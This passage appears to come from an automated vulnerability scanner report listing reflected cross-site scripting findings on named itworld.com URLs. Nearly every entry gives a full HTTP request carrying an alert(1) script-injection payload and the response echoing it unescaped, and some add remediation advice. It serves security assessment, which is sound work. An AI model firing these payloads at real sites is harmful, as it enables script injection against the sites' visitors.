Path:   /it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 285d2"><script>alert(1)</script>d33fe3f1e0d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /it-managementstrategy285d2"><script>alert(1)</script>d33fe3f1e0d/204223/cyber-harassers-you-can-hide-you-can-t-run HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:29:14 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460554"
Content-Type: text/html; charset=utf-8
Content-Length: 57862
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:29:15 GMT
X-Varnish: 1038167322
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/it-managementstrategy285d2"><script>alert(1)</script>d33fe3f1e0d/204223/cyber-harassers-you-can-hide-you-can-t-run"/>
...[SNIP]...

1.96. http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fd17"-alert(1)-"d480330d218 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /it-managementstrategy8fd17"-alert(1)-"d480330d218/204223/cyber-harassers-you-can-hide-you-can-t-run HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:29:20 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460560"
Content-Type: text/html; charset=utf-8
Content-Length: 57644
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:29:22 GMT
X-Varnish: 1038167692
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/it-managementstrategy8fd17"-alert(1)-"d480330d218/204223/cyber-harassers-you-can-hide-you-can-t-run";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn
...[SNIP]...

1.97. http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7332"><script>alert(1)</script>c396c0fb929 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /it-managementstrategy/204223c7332"><script>alert(1)</script>c396c0fb929/cyber-harassers-you-can-hide-you-can-t-run HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:29:32 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460572"
Content-Type: text/html; charset=utf-8
Content-Length: 57863
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:29:34 GMT
X-Varnish: 1038168391
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/it-managementstrategy/204223c7332"><script>alert(1)</script>c396c0fb929/cyber-harassers-you-can-hide-you-can-t-run"/>
...[SNIP]...

1.98. http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1c0a"-alert(1)-"4e4b1bce61 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /it-managementstrategy/204223b1c0a"-alert(1)-"4e4b1bce61/cyber-harassers-you-can-hide-you-can-t-run HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:29:38 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460578"
Content-Type: text/html; charset=utf-8
Content-Length: 57634
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:29:39 GMT
X-Varnish: 1038168635
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
4="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/it-managementstrategy/204223b1c0a"-alert(1)-"4e4b1bce61/cyber-harassers-you-can-hide-you-can-t-run";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find
...[SNIP]...

1.99. http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 460eb"-alert(1)-"67f87e41f93 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run460eb"-alert(1)-"67f87e41f93 HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:29:52 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460592"
Content-Type: text/html; charset=utf-8
Content-Length: 57644
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:29:53 GMT
X-Varnish: 1038168856
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
6="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run460eb"-alert(1)-"67f87e41f93";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
s.eVar13="CMS";

...[SNIP]...

1.100. http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89fa4"><script>alert(1)</script>83613f9433e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run89fa4"><script>alert(1)</script>83613f9433e HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:29:47 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460587"
Content-Type: text/html; charset=utf-8
Content-Length: 57864
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:29:48 GMT
X-Varnish: 1038168757
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run89fa4"><script>alert(1)</script>83613f9433e"/>
...[SNIP]...

1.101. http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d18d2"><script>alert(1)</script>794165fd13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run?d18d2"><script>alert(1)</script>794165fd13=1 HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-1; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D14%3B%20SC_LINKS%3Dhomepage%255E%255ECyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255Ehomepage%2520%257C%2520Cyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%255E%255E%3B%20s_sq%3Didgitworldcomprod%253D%252526pid%25253Dhomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run%252526ot%25253DA%3B; s_pers=%20s_pv%3Dhomepage%7C1316479993320%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:28:03 +0000
Vary: Cookie
ETag: "1316460483"
Content-Type: text/html; charset=utf-8
Content-Length: 121715
X-Cacheable: YES
Date: Mon, 19 Sep 2011 19:28:06 GMT
X-Varnish: 1038165150
Via: 1.1 varnish
Connection: keep-alive
age: 0
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run?d18d2"><script>alert(1)</script>794165fd13=1"/>
...[SNIP]...

1.102. http://www.itworld.com/kickapps/isfollowing-comments/204223 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /kickapps/isfollowing-comments/204223

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58b58"-alert(1)-"a48bb4a4ab8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kickapps58b58"-alert(1)-"a48bb4a4ab8/isfollowing-comments/204223 HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-2; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_pers=%20s_pv%3Dblog%253A204223%253ACyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%253A2011-09-16%7C1316480024395%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:28:30 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460510"
Content-Type: text/html; charset=utf-8
Content-Length: 57293
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:28:31 GMT
X-Varnish: 1038165985
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
rop13="CMS";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/kickapps58b58"-alert(1)-"a48bb4a4ab8/isfollowing-comments/204223";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you r
...[SNIP]...

1.103. http://www.itworld.com/kickapps/isfollowing-comments/204223 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /kickapps/isfollowing-comments/204223

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57697"><script>alert(1)</script>bd8827fba4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /kickapps57697"><script>alert(1)</script>bd8827fba4e/isfollowing-comments/204223 HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-2; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_pers=%20s_pv%3Dblog%253A204223%253ACyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%253A2011-09-16%7C1316480024395%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
